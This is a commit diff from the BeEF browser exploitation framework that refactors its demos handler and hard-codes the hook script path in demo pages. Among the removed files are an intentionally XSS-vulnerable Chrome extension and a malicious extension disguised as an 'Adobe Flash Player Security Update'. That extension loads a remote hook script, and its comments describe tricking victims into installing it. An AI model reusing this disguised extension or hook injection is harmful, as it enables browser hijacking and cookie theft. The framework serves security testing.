Extensions: Demos: Modify Handler to extend the Router class (#2795)

* Extensions: Demos: Remove unused demo assets

* Extensions: Demos: Hard-code "/hook.js" hook path

* Extensions: Demos: Fix copyright header format

* Extensions: Demos: Modify Handler to extend the Router class

extensions/demos/api.rb

@@ -9,23 +9,13 @@ module BeEF
       module RegisterHttpHandlers
         BeEF::API::Registrar.instance.register(BeEF::Extension::Demos::RegisterHttpHandlers, BeEF::API::Server, 'mount_handler')
 
+        #
+        # Mounts the handlers for the demos pages
+        #
+        # @param beef_server [BeEF::Core::Server] HTTP server instance
+        #
         def self.mount_handler(beef_server)
-          # mount everything in html directory to /demos/
-          path = "#{File.dirname(__FILE__)}/html/"
-          files = Dir["#{path}**/*"]
-
-          beef_server.mount('/demos', Rack::File.new(path))
-
-          files.each do |f|
-            # don't follow symlinks
-            next if File.symlink?(f)
-
-            mount_path = "/demos/#{f.sub(path, '')}"
-            if File.extname(f) == '.html'
-              # use handler to mount HTML templates
-              beef_server.mount(mount_path, BeEF::Extension::Demos::Handler.new(f))
-            end
-          end
+          beef_server.mount('/demos', BeEF::Extension::Demos::Handler.new)
         end
       end
     end

extensions/demos/chrome_extension/index.html

@@ -1,91 +0,0 @@
-<!--
-    Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
-    Browser Exploitation Framework (BeEF) - http://beefproject.com
-    See the file 'doc/COPYING' for copying permission
--->
-<!doctype html>
-<html>
-<head>
-<!-- originally created by Nithin Bekal -->
-  <title>My Todo List</title>
-  <style>
-  body { background: #0f0f0f; font-family: Tahoma, sans-serif; font-size: 11px; }
-  header, section, footer { display: block; }
-  #container { background-color: #eee; margin: 0 auto; width: 300px; border: 4px solid #222; }
-  header h1 { text-align: center; margin: 0; padding: 15px 0;}
-  label { display: block; padding-bottom: 5px; text-align: center; }
-  #task { border: 1px solid #888; margin-left: 50px; width: 200px; }
-  #tasks { margin: 20px; padding: 0; }
-  #tasks li { list-style-type: none; padding: 5px; }
-  #tasks li:nth-child(2n) { background-color: #e8e8e8; }
-  #tasks li:nth-child(2n+1) { background-color: #ddd; }
-  #tasks li:hover { background-color: #ccc; }
-  #tasks li a { color: red; display: block; float: right; text-decoration: none; }
-  footer { background-color: #000; color: #aaa; padding: 20px; }
-  footer a { color: #aaa; }
-  footer a:hover { color: #eee; }
-  </style>
-</head>
-<body>
-<div id="container">
-  <header>
-    <h1>HTML5 Todo App</h1>
-  </header>
-  
-  <section id="main-content">
-    <div class="form-area">
-      <form id="tasks-form">
-        <label for="task">Add a task here and hit enter</label>
-        <input id="task" autofocus>
-      </form>
-    </div>
-  
-    <ul id="tasks"></ul>
-  </section>
-  
-  <footer>
-    <a href="http://nithinbekal.com/2010/12/04/a-simple-to-do-list-app-using-html5-and-local-storage/">How to create this app</a> |
-  </footer>
-</div>
-  <script type="text/javascript" src="jquery-1.4.2.js"></script>
-  <script type="text/javascript"> 
-    $(document).ready(function() { 
-    
-      var i = 0;
-      
-      // Initial loading of tasks
-      for( i = 0; i < localStorage.length; i++)
-        $("#tasks").append("<li id='task-"+ i +"'>" + localStorage.getItem('task-'+i) + " <a href='#'>x</a></li>");
-        
-      // Add a task
-      $("#tasks-form").submit(function() {
-        if (  $("#task").val() != "" ) {
-          localStorage.setItem( "task-"+i, $("#task").val() );
-          $("#tasks").append("<li id='task-"+i+"'>"+localStorage.getItem("task-"+i)+" <a href='#'>x</a></li>")
-          $("#task-" + i).css('display', 'none');
-          $("#task-" + i).slideDown();
-          $("#task").val("");
-          i++;
-        }
-        return false;
-      });
-      
-      // Remove a task      
-      $("#tasks li a").live("click", function() {
-        localStorage.removeItem($(this).parent().attr("id"));
-        $(this).parent().slideUp('slow', function() { $(this).remove(); } );
-        for(i=0; i<localStorage.length; i++) {
-          if( !localStorage.getItem("task-"+i)) {
-            localStorage.setItem("task-"+i, localStorage.getItem('task-' + (i+1) ) );
-            localStorage.removeItem('task-'+ (i+1) );
-          }
-        }
-      });
-    });
-  // when the browser icon is clicked, a new tab is open to maintain persistence (chrome.tabs.create)
-  // for the sake of testing...unfortunately the popup is closed when the user is not focusing on it.	
-	chrome.tabs.create({url: chrome.extension.getURL('persistent_tab.html')});
-  </script>
-
-</body>
-</html>

extensions/demos/chrome_extension/manifest.json

@@ -1,18 +0,0 @@
-{
-  //originally created by Nithin Bekal
-  "name": "BeEF vulnerable chrome extensions (TodoList)",
-  "version": "1.0",
-  // when the browser icon is clicked, a new tab is open to maintain persistence (chrome.tabs.create)
-  // for the sake of testing...unfortunately the popup is closed when the user is not focusing on it.
-  // See at the end of index.html file.
-  "description": "A simple todo list in HTML5 with localStorage, vulnerable to XSS.",
-  "browser_action": {
-    "default_icon": "favicon.ico",
-	"popup": "index.html"
-  },
-  "permissions": [
-	"tabs", 
-	"http://*/*", 
-	"https://*/*"
-  ]
-}

extensions/demos/chrome_extension/persistent_tab.html

@@ -1,93 +0,0 @@
-<!--
-    Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
-    Browser Exploitation Framework (BeEF) - http://beefproject.com
-    See the file 'doc/COPYING' for copying permission
--->
-<!doctype html>
-<html>
-<head>
-<!-- originally created by Nithin Bekal -->
-  <title>My Todo List</title>
-  <style>
-  body { background: #0f0f0f; font-family: Tahoma, sans-serif; font-size: 11px; }
-  header, section, footer { display: block; }
-  #container { background-color: #eee; margin: 0 auto; width: 300px; border: 4px solid #222; }
-  header h1 { text-align: center; margin: 0; padding: 15px 0;}
-  label { display: block; padding-bottom: 5px; text-align: center; }
-  #task { border: 1px solid #888; margin-left: 50px; width: 200px; }
-  #tasks { margin: 20px; padding: 0; }
-  #tasks li { list-style-type: none; padding: 5px; }
-  #tasks li:nth-child(2n) { background-color: #e8e8e8; }
-  #tasks li:nth-child(2n+1) { background-color: #ddd; }
-  #tasks li:hover { background-color: #ccc; }
-  #tasks li a { color: red; display: block; float: right; text-decoration: none; }
-  footer { background-color: #000; color: #aaa; padding: 20px; }
-  footer a { color: #aaa; }
-  footer a:hover { color: #eee; }
-  </style>
-</head>
-<body>
-<div id="container">
-  <header>
-    <h1>HTML5 Todo App</h1>
-  </header>
-  
-  <section id="main-content">
-    <div class="form-area">
-      <form id="tasks-form">
-        <label for="task">Add a task here and hit enter</label>
-        <input id="task" autofocus>
-      </form>
-    </div>
-  
-    <ul id="tasks"></ul>
-  </section>
-  
-  <footer>
-    <a href="http://nithinbekal.com/2010/12/04/a-simple-to-do-list-app-using-html5-and-local-storage/">How to create this app</a> |
-  </footer>
-</div>
-  <script type="text/javascript" src="jquery-1.4.2.js"></script>
-  
-  <!-- Change it with your BeEF hook path -->
-  <script src="http://192.168.10.1/hook.js"></script>
-  <!-- / Change it with your BeEF hook path -->
-  
-  <script type="text/javascript"> 
-    $(document).ready(function() { 
-    
-      var i = 0;
-      
-      // Initial loading of tasks
-      for( i = 0; i < localStorage.length; i++)
-        $("#tasks").append("<li id='task-"+ i +"'>" + localStorage.getItem('task-'+i) + " <a href='#'>x</a></li>");
-        
-      // Add a task
-      $("#tasks-form").submit(function() {
-        if (  $("#task").val() != "" ) {
-          localStorage.setItem( "task-"+i, $("#task").val() );
-          $("#tasks").append("<li id='task-"+i+"'>"+localStorage.getItem("task-"+i)+" <a href='#'>x</a></li>")
-          $("#task-" + i).css('display', 'none');
-          $("#task-" + i).slideDown();
-          $("#task").val("");
-          i++;
-        }
-        return false;
-      });
-      
-      // Remove a task      
-      $("#tasks li a").live("click", function() {
-        localStorage.removeItem($(this).parent().attr("id"));
-        $(this).parent().slideUp('slow', function() { $(this).remove(); } );
-        for(i=0; i<localStorage.length; i++) {
-          if( !localStorage.getItem("task-"+i)) {
-            localStorage.setItem("task-"+i, localStorage.getItem('task-' + (i+1) ) );
-            localStorage.removeItem('task-'+ (i+1) );
-          }
-        }
-      });
-    }); 
-  </script>
-
-</body>
-</html>

extensions/demos/flash_update_chrome_extension/background.js

@@ -1,11 +0,0 @@
-/*
- * Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
- * Browser Exploitation Framework (BeEF) - http://beefproject.com
- * See the file 'doc/COPYING' for copying permission
- */
-
-d=document;
-e=d.createElement('script');
-e.src="https://192.168.0.2/hook.js";
-d.body.appendChild(e);
-

extensions/demos/flash_update_chrome_extension/manifest.json

@@ -1,34 +0,0 @@
-{
-    // Simple chrome extension, by antisnatchor and Mike Haworth
-    // Just loads BeEF into the extension context.
-    //
-    // 1. You need to set the IP address (better the domain) of the BeEF hook in background.js
-    // 2. The BeEF hook address must be == to the CSP allowed domain here below. BeEF must listen on port 443, with TLS enabled.
-    //    Only localhost origin is allowed to load scripts from non HTTPS resources. For anything else, you must use HTTPS.
-    // 4. You need to upload the extension, as a zip file, to Google Chrome store.
-    //    In latest versions of Chrome (>= 21) you can't install an extension from a different location anymore,
-    //    so the extension can't be served by BeEF anymore. You need to trick the victim to install
-    //    the extension from Google Chrome store.
-    //
-
-    "name": "Adobe Flash Player Security Update",
-    "manifest_version": 2,
-    "version": "11.5.502.149",
-    "description": "Updates Adobe Flash Player with latest securty updates",
-    "background": {
-        "scripts": ["background.js"]
-    },
-    "content_security_policy": "script-src 'self' 'unsafe-eval' https://192.168.0.2; object-src 'self'",
-    "icons": {
-        "16": "icon16.png",
-        "48": "icon48.png",
-        "128": "icon128.png"
-    },
-    "permissions": [
-        "tabs",
-        "http://*/*",
-        "https://*/*",
-        "file://*/*",
-        "cookies"
-    ]
-}

extensions/demos/handler.rb

@@ -6,46 +6,8 @@
 module BeEF
   module Extension
     module Demos
-      class Handler
-        def initialize(file_path)
-          if File.exist?(file_path)
-            @file_path = file_path
-          else
-            print_error "[Demos] File does not exist: #{file_path}"
-          end
-        end
-
-        def call(env)
-          @body = ''
-          @request = Rack::Request.new(env)
-          @params = @request.query_string
-          @response = Rack::Response.new(body = [], 200, header = {})
-          config = BeEF::Core::Configuration.instance
-          eruby = Erubis::FastEruby.new(File.read(@file_path))
-          @body << eruby.evaluate(
-            'hook_uri' => config.get('beef.http.hook_file')
-          )
-
-          @response = Rack::Response.new(
-            body = [@body],
-            status = 200,
-            header = {
-              'Pragma' => 'no-cache',
-              'Cache-Control' => 'no-cache',
-              'Expires' => '0',
-              'Content-Type' => 'text/html'
-            }
-          )
-        end
-
-        # @note String representing the absolute path to the .html file
-        @file_path
-
-        # @note Object representing the HTTP request
-        @request
-
-        # @note Object representing the HTTP response
-        @response
+      class Handler < BeEF::Core::Router::Router
+        set :public_folder, File.expand_path(File.dirname(__FILE__)) + '/html/'
       end
     end
   end

extensions/demos/html/basic.html

@@ -1,17 +1,14 @@
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 <html>
 <!--
-    Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
 <head>
 	<title>BeEF Basic Demo</title>
 	<meta charset="utf-8"/>
-	<script>
-		var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';
-		document.write(commandModuleStr);
-	</script>
+	<script src="/hook.js"></script>
 </head>
 
 <body>

extensions/demos/html/butcher/butch.css

@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
@@ -62,4 +62,4 @@ body {
 a:link {color:#000;}      /* unvisited link */
 a:visited {color:#000}  /* visited link */
 a:hover {color:#000;}  /* mouse over link */
-a:active {color:#000;}  /* selected link */
+a:active {color:#000;}  /* selected link */

extensions/demos/html/butcher/index.html

@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
@@ -28,10 +28,7 @@
 	}
 
 </script>
-<script>
-	var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';
-	document.write(commandModuleStr);
-</script>
+<script src="/hook.js"></script>
 <div id="content">
 	<!-- Awesome Beef Images from: http://www.flickr.com/photos/bulle_de/4657658048/ and http://www.flickr.com/photos/dinesarasota/3944042189/ -->
 	<div id="logo">

extensions/demos/html/clickjacking/clickjack_attack.html

@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
@@ -109,12 +109,8 @@ font-size:20px;
 </style>
 </head>
 <body>
-<!-- BeEF hook call -->
-<script type="text/javascript">
-	var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '<%= @hook_uri %>" type="text/javascript"><\/script>';
-	document.write(commandModuleStr);
-</script>
 
+<script src="/hook.js"></script>
 
 <div class="wrapper">
 	<div class="quotes">

extensions/demos/html/clickjacking/clickjack_victim.html

@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->

extensions/demos/html/plain.html

@@ -5,10 +5,7 @@
 -->
 <html>
 <head>
-<script>
-  var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';
-  document.write(commandModuleStr);
-</script>
+<script src="/hook.js"></script>
 </head>
 <body>
 </body>

extensions/demos/html/report.html

@@ -1,18 +1,15 @@
 <!--
-    Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
 <html><head>
 <title>Loading</title>
-<script>
-	var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';
-	document.write(commandModuleStr);
-</script>
+<script src="/hook.js"></script>
 </head><body>
-	<br>
-	<br>
-	<br>
+<br/>
+<br/>
+<br/>
 <div align="middle"><img src="ajax-loader.gif" /></div>
 </body></html>

extensions/demos/html/secret_page.html

@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->

modules/browser/play_sound/module.rb

@@ -4,21 +4,12 @@
 # See the file 'doc/COPYING' for copying permission
 #
 class Play_sound < BeEF::Core::Command
-  # set and return all options for this module
   def self.options
-    @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.beef_proto
-    beef_host = @configuration.beef_host
-    beef_port = @configuration.beef_port
-    base_host = "#{proto}://#{beef_host}:#{beef_port}"
-
-    sound_file_url = "#{base_host}/demos/sound.wav"
-
     [{
       'name' => 'sound_file_uri',
       'description' => 'The web accessible URI for the wave sound file.',
       'ui_label' => 'Sound File Path',
-      'value' => sound_file_url,
+      'value' => '',
       'width' => '300px'
     }]
   end